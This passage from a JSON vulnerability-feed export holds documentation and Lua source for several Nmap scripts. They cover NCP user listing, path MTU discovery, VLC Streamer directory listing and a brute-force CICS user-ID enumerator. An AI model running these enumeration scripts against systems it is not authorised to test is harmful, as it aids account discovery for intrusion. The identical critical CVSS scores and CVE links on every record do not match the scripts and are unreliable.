output[\"Model\"]:lower())\n end\n nmap.set_port_version(host, port, \"hardmatched\")\n\n return output\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:41:11", "description": "Retrieves a list of all eDirectory users from the Novell NetWare Core Protocol (NCP) service.\n\n## Example Usage \n \n \n nmap -sV --script=ncp-enum-users <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 524/tcp open ncp syn-ack\n | ncp-enum-users:\n | CN=admin.O=cqure\n | CN=cawi.OU=finance.O=cqure\n | CN=linux-l84tadmin.O=cqure\n | CN=nist.OU=hr.O=cqure\n | CN=novlxregd.O=cqure\n | CN=novlxsrvd.O=cqure\n | CN=OESCommonProxy_linux-l84t.O=cqure\n | CN=sasi.OU=hr.O=cqure\n |_ CN=wwwrun.O=cqure\n \n\n## Requires \n\n * [ncp](<../lib/ncp.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-05-28T09:01:31", "type": "nmap", "title": "ncp-enum-users NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": 
"2015-11-05T20:41:05", "id": "NMAP:NCP-ENUM-USERS.NSE", "href": "https://nmap.org/nsedoc/scripts/ncp-enum-users.html", "sourceData": "local ncp = require \"ncp\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves a list of all eDirectory users from the Novell NetWare Core Protocol (NCP) service.\n]]\n\n---\n--\n--@output\n-- PORT STATE SERVICE REASON\n-- 524/tcp open ncp syn-ack\n-- | ncp-enum-users:\n-- | CN=admin.O=cqure\n-- | CN=cawi.OU=finance.O=cqure\n-- | CN=linux-l84tadmin.O=cqure\n-- | CN=nist.OU=hr.O=cqure\n-- | CN=novlxregd.O=cqure\n-- | CN=novlxsrvd.O=cqure\n-- | CN=OESCommonProxy_linux-l84t.O=cqure\n-- | CN=sasi.OU=hr.O=cqure\n-- |_ CN=wwwrun.O=cqure\n--\n\n-- Version 0.1\n-- Created 04/26/2011 - v0.1 - created by Patrik Karlsson\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"auth\", \"safe\"}\n\n\nportrule = shortport.port_or_service(524, \"ncp\", \"tcp\")\n\naction = function(host, port)\n local helper = ncp.Helper:new(host,port)\n\n local status, resp = helper:connect()\n if ( not(status) ) then return stdnse.format_output(false, resp) end\n\n status, resp = helper:search(\"[Root]\", \"User\", \"*\")\n if ( not(status) ) then return stdnse.format_output(false, resp) end\n\n local output = {}\n\n for _, entry in ipairs(resp) do\n table.insert(output, entry.name)\n end\n\n return stdnse.format_output(true, output)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:43", "description": "Performs simple Path MTU Discovery to target hosts. \n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set and with varying amounts of data. If an ICMP Fragmentation Needed is received, or no reply is received after retransmissions, the amount of data is lowered and another packet is sent. 
This continues until (assuming no errors occur) a reply from the final host is received, indicating the packet reached the host without being fragmented. \n\nNot all MTUs are attempted so as to not expend too much time or network resources. Currently the relatively short list of MTUs to try contains the plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\". Using these values significantly cuts down the MTU search space. On top of that, this list is rarely traversed in whole because: \n\n * the MTU of the outgoing interface is used as a starting point, and \n * we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n\n## Example Usage \n \n \n nmap --script path-mtu target\n \n\n## Script Output \n \n \n Host script results:\n |_path-mtu: 1492 <= PMTU < 1500\n \n Host script results:\n |_path-mtu: PMTU == 1006\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-24T01:47:12", "type": "nmap", "title": "path-mtu NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-15T07:26:00", "id": "NMAP:PATH-MTU.NSE", "href": "https://nmap.org/nsedoc/scripts/path-mtu.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms simple Path MTU Discovery to target hosts.\n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set\nand with varying amounts of data. If an ICMP Fragmentation Needed is received,\nor no reply is received after retransmissions, the amount of data is lowered\nand another packet is sent. This continues until (assuming no errors occur) a\nreply from the final host is received, indicating the packet reached the host\nwithout being fragmented.\n\nNot all MTUs are attempted so as to not expend too much time or network\nresources. Currently the relatively short list of MTUs to try contains\nthe plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\".\nUsing these values significantly cuts down the MTU search space. 
On top\nof that, this list is rarely traversed in whole because:\n* the MTU of the outgoing interface is used as a starting point, and\n* we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n]]\n\n---\n-- @usage\n-- nmap --script path-mtu target\n--\n-- @output\n-- Host script results:\n-- |_path-mtu: 1492 <= PMTU < 1500\n--\n-- Host script results:\n-- |_path-mtu: PMTU == 1006\n\nauthor = \"Kris Katterjohn\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\nlocal IPPROTO_ICMP = packet.IPPROTO_ICMP\nlocal IPPROTO_TCP = packet.IPPROTO_TCP\nlocal IPPROTO_UDP = packet.IPPROTO_UDP\n\n-- Number of times to retransmit for no reply before dropping to\n-- another MTU value\nlocal RETRIES = 1\n\n-- RFC 1191, Table 7-1: Plateaus. Even the massive MTU values are\n-- here since we skip down the list based on the outgoing interface\n-- so its no harm.\nlocal MTUS = {\n 65535,\n 32000,\n 17914,\n 8166,\n 4352,\n 2002,\n 1492,\n 1006,\n 508,\n 296,\n 68\n}\n\n-- Find the index in MTUS{} to use based on the MTU +new+. 
If +new+ is in\n-- between values in MTUS, then insert it into the table appropriately.\nlocal searchmtu = function(cidx, new)\n if new == 0 then\n return cidx\n end\n\n while cidx <= #MTUS do\n if new >= MTUS[cidx] then\n if new ~= MTUS[cidx] then\n table.insert(MTUS, cidx, new)\n end\n return cidx\n end\n cidx = cidx + 1\n end\n return cidx\nend\n\nlocal dport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_dport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_dport\n end\nend\n\nlocal sport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_sport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_sport\n end\nend\n\n-- Checks how we should react to this packet\nlocal checkpkt = function(reply, orig)\n local ip = packet.Packet:new(reply, reply:len())\n\n if ip.ip_p == IPPROTO_ICMP then\n if ip.icmp_type ~= 3 then\n return \"recap\"\n end\n -- Port Unreachable\n if ip.icmp_code == 3 then\n local is = ip.buf:sub(ip.icmp_offset + 9)\n local ip2 = packet.Packet:new(is, is:len())\n\n -- Check sent packet against ICMP payload\n if ip2.ip_p ~= IPPROTO_UDP or\n ip2.ip_p ~= orig.ip_p or\n ip2.ip_bin_src ~= orig.ip_bin_src or\n ip2.ip_bin_dst ~= orig.ip_bin_dst or\n sport(ip2) ~= sport(orig) or\n dport(ip2) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\n end\n -- Frag needed, DF set\n if ip.icmp_code == 4 then\n local val = ip:u16(ip.icmp_offset + 6)\n return \"nextmtu\", val\n end\n return \"recap\"\n end\n\n if ip.ip_p ~= orig.ip_p or\n ip.ip_bin_src ~= orig.ip_bin_dst or\n ip.ip_bin_dst ~= orig.ip_bin_src or\n dport(ip) ~= sport(orig) or\n sport(ip) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\nend\n\n-- This is all we can use since we can get various protocols back from\n-- different hosts\nlocal check = function(layer3)\n local ip = packet.Packet:new(layer3, layer3:len())\n return ip.ip_bin_dst\nend\n\n-- Updates a packet's info and calculates checksum\nlocal updatepkt = function(ip)\n 
if ip.ip_p == IPPROTO_TCP then\n ip:tcp_set_sport(math.random(0x401, 0xffff))\n ip:tcp_set_seq(math.random(1, 0x7fffffff))\n ip:tcp_count_checksum()\n elseif ip.ip_p == IPPROTO_UDP then\n ip:udp_set_sport(math.random(0x401, 0xffff))\n ip:udp_set_length(ip.ip_len - ip.ip_hl * 4)\n ip:udp_count_checksum()\n end\n ip:ip_count_checksum()\nend\n\n-- Set up packet header and data to satisfy a certain MTU\nlocal setmtu = function(pkt, mtu)\n if pkt.ip_len < mtu then\n pkt.buf = pkt.buf .. string.rep(\"\\0\", mtu - pkt.ip_len)\n else\n pkt.buf = pkt.buf:sub(1, mtu)\n end\n\n pkt:ip_set_len(mtu)\n pkt.packet_length = mtu\n updatepkt(pkt)\nend\n\nlocal basepkt = function(proto)\n local ibin = stdnse.fromhex(\n \"4500 0014 0000 4000 8000 0000 0000 0000 0000 0000\"\n )\n local tbin = stdnse.fromhex(\n \"0000 0000 0000 0000 0000 0000 6002 0c00 0000 0000 0204 05b4\"\n )\n local ubin = stdnse.fromhex(\n \"0000 0000 0800 0000\"\n )\n\n if proto == IPPROTO_TCP then\n return ibin .. tbin\n elseif proto == IPPROTO_UDP then\n return ibin .. 
ubin\n end\nend\n\n-- Creates a Packet object for the given proto and port\nlocal genericpkt = function(host, proto, port)\n local pkt = basepkt(proto)\n local ip = packet.Packet:new(pkt, pkt:len())\n\n ip:ip_set_bin_src(host.bin_ip_src)\n ip:ip_set_bin_dst(host.bin_ip)\n\n ip:set_u8(ip.ip_offset + 9, proto)\n ip.ip_p = proto\n\n ip:ip_set_len(pkt:len())\n\n if proto == IPPROTO_TCP then\n ip:tcp_parse(false)\n ip:tcp_set_dport(port)\n elseif proto == IPPROTO_UDP then\n ip:udp_parse(false)\n ip:udp_set_dport(port)\n end\n\n updatepkt(ip)\n\n return ip\nend\n\nlocal ipproto = function(p)\n if p == \"tcp\" then\n return IPPROTO_TCP\n elseif p == \"udp\" then\n return IPPROTO_UDP\n end\n return -1\nend\n\n-- Determines how to probe\nlocal getprobe = function(host)\n local combos = {\n { \"tcp\", \"open\" },\n { \"tcp\", \"closed\" },\n -- udp/open probably only happens when Nmap sends proper\n -- payloads, which doesn't happen in here\n { \"udp\", \"closed\" }\n }\n local proto = nil\n local port = nil\n\n for _, c in ipairs(combos) do\n port = nmap.get_ports(host, nil, c[1], c[2])\n if port then\n proto = c[1]\n break\n end\n end\n\n return proto, port\nend\n\n-- Sets necessary probe data in registry\nlocal setreg = function(host, proto, port)\n host.registry['pathmtuprobe'] = {\n ['proto'] = proto,\n ['port'] = port\n }\nend\n\nhostrule = function(host)\n if not nmap.is_privileged() then\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}\n if not nmap.registry[SCRIPT_NAME].rootfail then\n stdnse.verbose1(\"not running for lack of privileges.\")\n end\n nmap.registry[SCRIPT_NAME].rootfail = true\n return nil\n end\n\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n if not (host.interface and host.interface_mtu) then\n return false\n end\n local proto, port = getprobe(host)\n if not (proto and port) then\n return false\n end\n setreg(host, proto, port.number)\n return true\nend\n\naction = 
function(host)\n local m, r\n local gotit = false\n local mtuset\n local sock = nmap.new_dnet()\n local pcap = nmap.new_socket()\n local proto = host.registry['pathmtuprobe']['proto']\n local port = host.registry['pathmtuprobe']['port']\n local saddr = ipOps.str_to_ip(host.bin_ip_src)\n local daddr = ipOps.str_to_ip(host.bin_ip)\n local try = nmap.new_try()\n local status, pkt, ip\n\n try(sock:ip_open())\n\n try = nmap.new_try(function() sock:ip_close() end)\n\n pcap:pcap_open(host.interface, 104, false, \"dst host \" .. saddr .. \" and (icmp or (\" .. proto .. \" and src host \" .. daddr .. \" and src port \" .. port .. \"))\")\n\n -- Since we're sending potentially large amounts of data per packet,\n -- simply bump up the host's calculated timeout value. Most replies\n -- should come from routers along the path, fragmentation reassembly\n -- times isn't an issue and the large amount of data is only traveling\n -- in one direction; still, we want a response from the target so call\n -- it 1.5*timeout to play it safer.\n pcap:set_timeout(1.5 * host.times.timeout * 1000)\n\n m = searchmtu(1, host.interface_mtu)\n\n mtuset = MTUS[m]\n\n local pkt = genericpkt(host, ipproto(proto), port)\n\n while m <= #MTUS do\n setmtu(pkt, MTUS[m])\n\n r = 0\n status = false\n while true do\n if not status then\n if not sock:ip_send(pkt.buf, host) then\n -- Got a send error, perhaps EMSGSIZE\n -- when we don't know our interface's\n -- MTU. Drop an MTU and keep trying.\n break\n end\n end\n\n local test = pkt.ip_bin_src\n local status, length, _, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer3) do\n status, length, _, layer3 = pcap:pcap_receive()\n end\n\n if status then\n local t, v = checkpkt(layer3, pkt)\n if t == \"gotreply\" then\n gotit = true\n break\n elseif t == \"recap\" then\n elseif t == \"nextmtu\" then\n if v == 0 then\n -- Router didn't send its\n -- next-hop MTU. 
Just drop\n -- a level.\n break\n end\n -- Lua's lack of a continue statement\n -- for loop control sucks, so dec m\n -- here as it's inc'd below. Ugh.\n m = searchmtu(m, v) - 1\n mtuset = v\n break\n end\n else\n if r >= RETRIES then\n break\n end\n r = r + 1\n end\n end\n\n if gotit then\n break\n end\n\n m = m + 1\n end\n\n pcap:close()\n sock:ip_close()\n\n if not gotit then\n if nmap.debugging() > 0 then\n return \"Error: Unable to determine PMTU (no replies)\"\n end\n return\n end\n\n if MTUS[m] == mtuset then\n return \"PMTU == \" .. MTUS[m]\n elseif m == 1 then\n return \"PMTU >= \" .. MTUS[m]\n else\n return \"\" .. MTUS[m] .. \" <= PMTU < \" .. MTUS[m - 1]\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:32", "description": "Connects to a VLC Streamer helper service and lists directory contents. The VLC Streamer helper service is used by the iOS VLC Streamer application to enable streaming of multimedia content from the remote server to the device.\n\n## Script Arguments \n\n#### http-vlcstreamer-ls.dir \n\ndirectory to list (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 54340 --script http-vlcstreamer-ls <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 54340/tcp open unknown\n | http-vlcstreamer-ls:\n | /Applications\n | /Developer\n | /Library\n | /Network\n | /Pictures\n | /System\n | /User Guides And Information\n | /Users\n | /Volumes\n | /bin\n | /bundles\n | /cores\n | /dev\n | /etc\n | /home\n | /mach_kernel\n | /net\n | /opt\n | /private\n | /sbin\n | /tmp\n | /usr\n |_ /var\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [json](<../lib/json.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-08T23:04:18", "type": "nmap", "title": "http-vlcstreamer-ls NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-VLCSTREAMER-LS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vlcstreamer-ls.html", "sourceData": "local http = require \"http\"\nlocal json = require \"json\"\nlocal shortport = require \"shortport\"\nlocal 
stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a VLC Streamer helper service and lists directory contents. The\nVLC Streamer helper service is used by the iOS VLC Streamer application to\nenable streaming of multimedia content from the remote server to the device.\n]]\n\n---\n-- @usage\n-- nmap -p 54340 --script http-vlcstreamer-ls <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 54340/tcp open unknown\n-- | http-vlcstreamer-ls:\n-- | /Applications\n-- | /Developer\n-- | /Library\n-- | /Network\n-- | /Pictures\n-- | /System\n-- | /User Guides And Information\n-- | /Users\n-- | /Volumes\n-- | /bin\n-- | /bundles\n-- | /cores\n-- | /dev\n-- | /etc\n-- | /home\n-- | /mach_kernel\n-- | /net\n-- | /opt\n-- | /private\n-- | /sbin\n-- | /tmp\n-- | /usr\n-- |_ /var\n--\n-- @args http-vlcstreamer-ls.dir directory to list (default: /)\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(54340, \"vlcstreamer\", \"tcp\")\n\nlocal arg_dir = stdnse.get_script_args(SCRIPT_NAME .. 
\".dir\") or \"/\"\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local response = http.get(host, port, (\"/secure?command=browse&dir=%s\"):format(arg_dir))\n\n if ( response.status ~= 200 or not(response.body) or 0 == #response.body ) then\n if ( response.status == 401 ) then\n return fail(\"Server requires authentication\")\n else\n return\n end\n end\n\n local status, parsed = json.parse(response.body)\n if ( not(status) ) then\n return fail(\"Failed to parse response\")\n end\n\n if ( parsed.errorMessage ) then\n return fail(parsed.errorMessage)\n end\n\n local output = {}\n for _, entry in pairs(parsed.files or {}) do\n table.insert(output,entry.path)\n end\n table.sort(output, function(a,b) return a<b end)\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:28", "description": "CICS User ID enumeration script for the CESL/CESN Login screen. Candidate IDs are submitted to the signon transaction one at a time and classified by the error message the external security manager (RACF, ACF2 or Top Secret) returns: a known invalid-user message marks the ID invalid, a known password-required message marks it valid, and any other response is reported as a possible valid ID with (roughly) the first line of the returned screen as the reason, so such entries should be checked by hand.\n\n## Script Arguments \n\n#### cics-user-enum.commands \n\nCommands in a semi-colon separated list needed to access CICS. Defaults to `CICS`.\n\n#### idlist \n\nPath to list of transaction IDs. Defaults to the list of CICS transactions from IBM. (Note: the script source shown here never reads this argument; the candidate user IDs come from the brute/unpwdb username list, i.e. `userdb`, as in the usage example.)\n\n#### cics-user-enum.transaction \n\nBy default this script uses the `CESL` transaction. On some systems the transaction ID `CESN` is needed. Use this argument to change the logon transaction ID.\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. 
\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=cics-user-enum -p 23 <targets>\n \n nmap --script=cics-user-enum --script-args userdb=users.txt,\n cics-user-enum.commands=\"exit;logon applid(cics42)\" -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 23/tcp open tn3270\n | cics-user-enum:\n | Accounts:\n | PLAGUE: Valid - CICS User ID\n |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n \n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T21:27:09", "type": "nmap", "title": "cics-user-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:07:55", "id": 
"NMAP:CICS-USER-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-user-enum.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\n\ndescription = [[\nCICS User ID enumeration script for the CESL/CESN Login screen.\n]]\n\n---\n-- @args idlist Path to list of transaction IDs.\n-- Defaults to the list of CICS transactions from IBM.\n-- @args cics-user-enum.commands Commands in a semi-colon separated list needed\n-- to access CICS. Defaults to <code>CICS</code>.\n-- @args cics-user-enum.transaction By default this script uses the <code>CESL</code> transaction.\n-- on some systems the transactio ID <code>CESN</code> is needed. Use this argument to change the\n-- logon transaction ID.\n--\n-- @usage\n-- nmap --script=cics-user-enum -p 23 <targets>\n--\n-- nmap --script=cics-user-enum --script-args userdb=users.txt,\n-- cics-user-enum.commands=\"exit;logon applid(cics42)\" -p 23 <targets>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 23/tcp open tn3270\n-- | cics-user-enum:\n-- | Accounts:\n-- | PLAGUE: Valid - CICS User ID\n-- |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n--\n-- @changelog\n-- 2016-08-29 - v0.1 - created by Soldier of Fortran\n-- 2016-12-19 - v0.2 - Added RACF support\n-- 2019-02-01 - v0.3 - Disabled TN3270E support\n--\n-- @author Philip Young\n-- @copyright Same as Nmap--See https://nmap.org/book/man-legal.html\n--\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\nDriver = {\n new = function(self, host, port, options)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port 
= port\n o.options = options\n o.tn3270 = tn3270.Telnet:new()\n o.tn3270:disable_tn3270e()\n return o\n end,\n connect = function( self )\n local status, err = self.tn3270:initiate(self.host,self.port)\n self.tn3270:get_screen_debug(2)\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false\n end\n return true\n end,\n disconnect = function( self )\n self.tn3270:disconnect()\n self.tn3270 = nil\n return true\n end,\n login = function (self, user, pass) -- pass is actually the UserID we want to try\n local commands = self.options['commands']\n local transaction = self.options['trn']\n local timeout = 300\n local max_blank = 1\n local loop = 1\n local err\n stdnse.debug(2,\"Getting to CICS\")\n local run = stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n self.tn3270:send_cursor(run[i])\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n end\n -- Are we at the logon transaction?\n if not (self.tn3270:find('SIGN ON TO CICS') and self.tn3270:find(\"Signon to CICS\")) then\n -- We might be at some weird screen, lets try and exit it then clear it out\n stdnse.debug(2,\"Sending: F3\")\n self.tn3270:send_pf(3) -- send F3\n self.tn3270:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n self.tn3270:send_clear()\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n stdnse.debug(2,\"Sending Transaction ID: %s\", transaction)\n self.tn3270:send_cursor(transaction)\n self.tn3270:get_all_data()\n -- Have we encoutered a slow system?\n if self.tn3270:isClear() then\n self.tn3270:get_all_data(1000)\n end\n self.tn3270:get_screen_debug(2)\n end\n -- At this point we MUST be at CESL/CESN to try accounts.\n -- If we're not then we quit with an error\n if not (self.tn3270:find('Type your userid and password')) then\n local err = brute.Error:new( \"Can't get to Transaction CESN\")\n err:setRetry( true )\n return false, err\n end\n\n -- Ok 
we're good we're at CESL/CESN. Enter the USERID.\n stdnse.verbose(\"Trying User ID: %s\", pass)\n self.tn3270:send_cursor(pass)\n self.tn3270:get_all_data()\n stdnse.debug(2,\"Screen Received for User ID: %s\", pass)\n self.tn3270:get_screen_debug(2)\n if self.tn3270:find('TSS7145E') or\n self.tn3270:find('ACF01004') or\n self.tn3270:find('DFHCE3530') then\n -- known invalid userid messages\n -- TopSecret: TSS7145E\n -- ACF2: ACF01004\n -- RACF: DFHCE3530\n stdnse.debug(\"Invalid CICS User ID: %s\", string.upper(pass))\n return false, brute.Error:new( \"Incorrect CICS User ID\" )\n elseif self.tn3270:find('TSS7102E') or\n self.tn3270:find('ACF01012') or\n self.tn3270:find('DFHCE3523') then\n -- TopSecret: TSS7102E Password Missing\n -- ACF2: ACF01012 PASSWORD NOT MATCHED\n -- RACF: DFHCE3523 Please type your password.\n stdnse.verbose(\"Valid CICS User ID: %s\", string.upper(pass))\n return true, creds.Account:new(\"CICS User\", string.upper(pass), creds.State.VALID)\n else\n stdnse.verbose(\"Valid(?) CICS User ID: %s\", string.upper(pass))\n -- The user may be valid for another reason, lets store that reason.\n stdnse.verbose(2,\"User: \" .. user .. \" MSG:\" .. self.tn3270:get_screen():sub(2,80))\n return true, creds.Account:new(\"CICS User: \".. string.upper(pass),'Reason: ' .. 
